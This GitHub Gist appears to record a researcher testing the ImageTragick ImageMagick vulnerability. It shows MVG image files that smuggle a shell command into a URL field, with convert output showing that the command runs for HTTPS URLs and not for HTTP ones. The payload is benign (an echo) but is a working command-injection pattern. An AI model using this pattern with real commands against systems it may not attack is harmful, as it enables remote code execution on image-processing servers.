Created
May 4, 2016 23:51
-
-
Save tmclaugh/24da549ae14de11361137ca7d39aa03d to your computer and use it in GitHub Desktop.
Remember to enable security for that added fuck you when exploiting ImageTragick
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## ImageTragick with HTTPS URL results in code execution | |
| vagrant@default-ubuntu-1404:~$ cat image-https.mvg | |
| push graphic-context | |
| viewbox 0 0 1 1 image over 0,0 0,0 'https://www.imagemagick.org"; echo CODE EXECUTION"' | |
| pop graphic-context | |
| vagrant@default-ubuntu-1404:~$ convert image-https.mvg image-https.png | |
| CODE EXECUTION | |
| convert.im6: unable to open image `/tmp/magick-M70rA2Ky': No such file or directory @ error/blob.c/OpenBlob/2638. | |
| convert.im6: unable to open file `/tmp/magick-M70rA2Ky': No such file or directory @ error/constitute.c/ReadImage/583. | |
| ## ImageTragick with HTTP URL does not result in execution | |
| vagrant@default-ubuntu-1404:~$ cat image-http.mvg | |
| push graphic-context | |
| viewbox 0 0 1 1 image over 0,0 0,0 'http://www.imagemagick.org"; echo CODE EXECUTION"' | |
| pop graphic-context | |
| vagrant@default-ubuntu-1404:~$ convert image-http.mvg image-http.png | |
| error : Unknown IO error | |
| convert.im6: no decode delegate for this image format `/tmp/magick-O6pEKXco' @ error/constitute.c/ReadImage/544. | |
| convert.im6: no data returned `http://localhost"; echo CODE EXECUTION"' @ error/url.c/ReadURLImage/232. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment